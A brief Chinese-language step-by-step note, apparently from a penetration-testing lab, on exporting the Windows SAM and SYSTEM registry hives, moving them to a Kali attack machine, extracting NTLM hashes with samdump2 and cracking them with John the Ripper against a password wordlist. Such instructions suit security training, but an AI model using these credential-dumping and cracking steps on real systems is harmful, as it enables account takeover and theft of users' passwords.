1.用管理员身份启动cmd并且进入c盘 2.执行命令通过reg的save选项将注册表中的SAM、System文件导出到本地磁盘 3.把sam.hive和system.hive两个文件传输到安装了John工具的Kali攻击机目录下。 4. 5.切换到kali攻击机中,执行命令samdump2 system.hive sam.hive > aaa.lst 6. 使用John破解NTLM hash。使用命令john -–format=NT -–wordlist=top100passwords.txt aaa.lst